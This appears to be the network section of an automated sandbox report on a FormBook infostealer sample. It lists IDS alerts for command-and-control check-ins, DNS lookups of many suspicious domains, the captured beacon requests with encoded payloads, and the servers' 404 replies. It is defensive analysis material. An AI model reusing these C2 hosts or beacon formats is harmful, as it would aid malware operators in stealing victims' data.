            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 161.97.168.245:80
            Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50030 -> 68.178.233.113:80
            Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50030 -> 68.178.233.113:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50033 -> 3.33.130.190:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50027 -> 68.178.233.113:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50037 -> 38.55.251.233:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50003 -> 3.33.130.190:80
            Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50041 -> 162.0.215.33:80
            Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50043 -> 162.0.215.33:80
            Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50043 -> 162.0.215.33:80
            Source: DNS query: www.golizle22.xyz
            Source: DNS query: www.booosted.xyz
            Source: Joe Sandbox View IP Address: 3.33.130.190
            Source: Joe Sandbox View ASN Name: ACPCA
            Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
            Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: Joe Sandbox View ASN Name: AS-26496-GO-DADDY-COM-LLCUS
            Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic HTTP traffic detected: GET /woyi/?An=mLdxo2Y8RLRh&ej6Le=liT4ZvY+2rzgu/UySgm47PML3ORjyZfCr6UpwpMzCweBEUZYpuqhq1mvJHjke4Uqr9Ttl6ktg6VhmA6yP/C42/0uWdACaDjPwlAEpqkr1rm8nQp5jQDy/v7kwBfcS6SUx+7tvUI= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US Host: www.whiterabbitgroup.pro Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /ctxc/?ej6Le=zdjwxosx+nYBz3+zbsBPWm+/7ve+ekB9VgYRIagILtbm8OwwRgMV6Kxr3Il58QUpA1eFuFbhbn4bqlVkjsdXtj71u+jihQLEfVmONzp8WE9uDtKzy1Bx2zuvnmoFIjKdlKtQFkI=&An=mLdxo2Y8RLRh HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US Host: www.wonders8.live Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /kpbt/?An=mLdxo2Y8RLRh&ej6Le=bzS3m8wIdYLAo6JC2B8v6DjkcYKoJ+/o0NmGFeD5SFiVCQOeD71i1fiBX/Z3MR+4fZ4gDTM+AXXLFXHhSs/mG9Ow8FixmQY8Mzsb0tyXAIso2XGTy+nTpErXCIb5tNtL4I1fOo4= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US Host: www.golizle22.xyz Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /fp1z/?ej6Le=UM9JF3nEU4xQ/PwLWGC6ZGprDkqeXDETquU6+bQNCANtrDf9n2+FDVI8iqG/UPksDfc6HQNuzTnZ4EJOssmSqFcoG0I3gKiI2YTwSr3+9s/MRsmHXzjzE9U3d6U0PlwuaFK3vCk=&An=mLdxo2Y8RLRh HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US Host: www.impulsarnegocios.info Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /odii/?ej6Le=dVBn/8h3nxQ+NW3HHa2Dil9IxOpuSbZnLfq0vBwwz2PjK6Osa+4r5Mmz4BUq4xUHF4JCazXFRId1LoC3dnRZfR9dh4rO42NOGnzVyjLt/mUqEpvHWr7qJMesP485wi7mHEQ5T/k=&An=mLdxo2Y8RLRh HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US Host: www.nieuws-july202541.sbs Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /epk2/?ej6Le=5hSJrytQEf2r193N2AyKKNas1p8do7y+C8hF198jiQrVzRfSjh9C72xB1f8gK0fXwE+oGLvPau9gCypTG2u5T5i3An2mBAgKXA59UHv+xIL7sVXWIuP/SFcs74Xei//AEoJSK5E=&An=mLdxo2Y8RLRh HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US Host: www.acuarelacr.buzz Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /spso/?ej6Le=tFeIgmxzndAX18VLtJk/zbNv0lImNRb288p8UUCUbjDyDydKnVlzDYJug8WZqOAMxfoP9GMdNXzPVq95XWLVPrBzbN/BvIU7kFB3pLyGJrR2t8RTUX3UsiymoOhQ+PD/dlbX4PM=&An=mLdxo2Y8RLRh HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US Host: www.booosted.xyz Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /8blm/?ej6Le=HSrh+kNg29vzDhmFvPtm7umcbnSkD02Ywpq4W1dSB1gaYliK2tVtZVmlspEFfRCsj7T0RA4zUvJ1xW3xieZGFm3Omt7rhJzIl1qpMMAhzN+EcK1k2mGj+1ZxR4qvhmW1pUGTA/Y=&An=mLdxo2Y8RLRh HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US Host: www.gegeesthreadworks.info Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /dbaa/?ej6Le=k+2h99XjzdZ+a8Guk9H+DZKAegT3yZPFsem4T4eX/urocpQMmPRl+MIiB7TuMhw38cELxfo4GPEke8/YGnuBTMId45zKJfXr14lU8gtHFAMAaoG54zLZ3lT6+2fSDV7gKgn9GEE=&An=mLdxo2Y8RLRh HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US Host: www.sellvolt.life Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /m1w5/?ej6Le=3rMHf/BSjWsGYHwCFDyQr7UpHD469M8Ow0JV4TmI6XMWIkQCx3J07rEG1KeFsj1Bt3GmHG0JhP0iSMuoC4YaBVBwifK18YsKoqHqcY+PGErO86AoCrs033ftT3/LwHGHiZtPsOM=&An=mLdxo2Y8RLRh HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US Host: www.kk88.live Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /g5rn/?ej6Le=g7r8ZVC0cxJrkvwRypX7ol6hCzLGk0q5Jh6A3BrwknfWwIjVhyX9x4N34a97pOgSsNGPocoejkJQBdcVqC7tK2vQwMKTMeAj0+OVYz2VfmsetKnlMlSnUnOZTT0AV1eZjywajZ8=&An=mLdxo2Y8RLRh HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US Host: www.cablecarrental.net Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /9wb2/?ej6Le=5UlEP0kDVMW/PPEwoDc70sMozoicrCD3NhlqEuGPGOUFJHosOZBhD6Eku4DzDmeGf+gBdkEGC1Jne06x+N2lRr6ZxBLzarbPmMoZ56wq7frcAS7q07bHFFW9m+jVLfRUYpA8+/U=&An=mLdxo2Y8RLRh HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US Host: www.kuaimaolife.shop Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /rq5n/?ej6Le=pmXEr/OQw9QJm4Xk+l3iuqWeb8HinOXDTGqjp1WLtMjib1CidozVAjoZZY6l6lG8OprBPnix8hR5i/scUhhw8x7Qq3ZF1dacyLUi3r4qrR6Xp8uTLrynRTshDzTWpn0bQ1psq0A=&An=mLdxo2Y8RLRh HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US Host: www.nieuws-july202491.sbs Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /x0tl/?An=mLdxo2Y8RLRh&ej6Le=9tQWqttnWu7MjGZLyiEcCzdUDF7UN3PBgIeLryHozuROP/1ck4METjVt2AM5oXaP3hSOrK+o7VaG5j6GesXwOMuHrEAdecfGMf0B1/a+f8XsVC4h6LXHmO6QOE5KLV0/obdy6xQ= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US Host: www.meliorahomes.net Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic DNS traffic detected: DNS query: www.whiterabbitgroup.pro
            Source: global traffic DNS traffic detected: DNS query: www.wonders8.live
            Source: global traffic DNS traffic detected: DNS query: www.golizle22.xyz
            Source: global traffic DNS traffic detected: DNS query: www.impulsarnegocios.info
            Source: global traffic DNS traffic detected: DNS query: www.nieuws-july202541.sbs
            Source: global traffic DNS traffic detected: DNS query: www.acuarelacr.buzz
            Source: global traffic DNS traffic detected: DNS query: www.booosted.xyz
            Source: global traffic DNS traffic detected: DNS query: www.gegeesthreadworks.info
            Source: global traffic DNS traffic detected: DNS query: www.sellvolt.life
            Source: global traffic DNS traffic detected: DNS query: www.kk88.live
            Source: global traffic DNS traffic detected: DNS query: www.cablecarrental.net
            Source: global traffic DNS traffic detected: DNS query: www.o30cf998d.cfd
            Source: global traffic DNS traffic detected: DNS query: www.kuaimaolife.shop
            Source: global traffic DNS traffic detected: DNS query: www.nieuws-july202491.sbs
            Source: global traffic DNS traffic detected: DNS query: www.meliorahomes.net
            Source: unknown HTTP traffic detected: POST /ctxc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Host: www.wonders8.live Origin: http://www.wonders8.live Connection: close Content-Length: 210 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.wonders8.live/ctxc/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Ascii: ej6Le=+fLQydoi4CxWqAysIZNDbyamuYq8BV1cXEoWIbwubt2D0t49S1kR5chs88YDhlQePkCT10zTTVQxk1hFydRyxCL6nNDtmjfHclGyIRpuCE91WeXGmSMaqQv85khGIVe49KdwMx1sBa3gtossEG+T/zZ6TAsZRfbfSQFnTBGP5x4ojKMIgKU2g7jzf9r99+mD78LP8ww8YNSc
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 07 Oct 2024 10:33:47 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 358 Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 07 Oct 2024 10:33:49 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 358 Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 07 Oct 2024 10:33:52 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 358 Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 07 Oct 2024 10:33:54 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT Accept-Ranges: bytes Content-Length: 583 Vary: Accept-Encoding Content-Type: text/html Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 07 Oct 2024 10:34:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache x-turbo-charged-by: LiteSpeed CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LL37YFXTRqAIbPLbXeOE%2FYraQGhB566vXWDUjHGuYJaxdaNdgUuFHNG27XbnLVWYWiOp0qb%2BLnC7wfYIXW2SDAIa7v9hfLKS2%2BIP3L8f4%2FNQbofDeS6lHXze%2Bbj2IkN8iEmETw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ced3c781af6438a-EWR Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 07 Oct 2024 10:34:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache x-turbo-charged-by: LiteSpeed CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jdca9yCKIUd0ide0nZ31LWurKy8GwdMBWW1LfuqAS7NIm6v%2BfLYCgBqvOBsBSj%2BC8nIw5x8UAtAI%2FaiqCgiB4Jj8TNxjcn3gs8r8z%2BOqymherLgkh3E%2FFXuRLqule9%2Bk66CpOw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ced3c881df40fa5-EWR Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 07 Oct 2024 10:34:05 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache x-turbo-charged-by: LiteSpeed CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DlypyjFHiEkxP%2Bd7LkTEOG1O1ahbNnUfRqpTE%2F8oY2YD5rdrOwG22n82myIHMqH6%2BgiKJ9DcTzCK6DWaoZPrPeo%2FELQyrk8ZyEtk6Rlv%2BhUhG60qzttPcdtsJRWKZKsQa0Wg0Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ced3c97ff1141df-EWR Content-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 10:34:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FQpy3yq3u3lgGcrRTufJL2fOEYn2ANFOb%2FgwsKv8PCDybak1Mlt79eFmPM7Nd%2BcdtCRHAGAX6FLCfT1S8uhVu3ZdUzmS95LjP%2F2KF%2F9902u0BqHHwDfBnUjsAoyoXaI7JH9fQA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8ced3ca7eac88cc6-EWR Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 07 Oct 2024 10:34:28 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 07 Oct 2024 10:34:30 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 07 Oct 2024 10:34:33 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Mon, 07 Oct 2024 10:34:35 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 10:34:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 10:34:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 10:34:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 10:34:49 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 10:35:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 10:35:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 10:35:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 10:35:29 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 07 Oct 2024 10:35:35 GMT
            Server: Apache
            Content-Length: 315
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 07 Oct 2024 10:35:38 GMT
            Server: Apache
            Content-Length: 315
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 07 Oct 2024 10:35:40 GMT
            Server: Apache
            Content-Length: 315
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 07 Oct 2024 10:35:43 GMT
            Server: Apache
            Content-Length: 315
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 07 Oct 2024 10:36:10 GMT
            Content-Type: text/html
            Content-Length: 548
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 07 Oct 2024 10:36:13 GMT
            Content-Type: text/html
            Content-Length: 548
            Connection: close
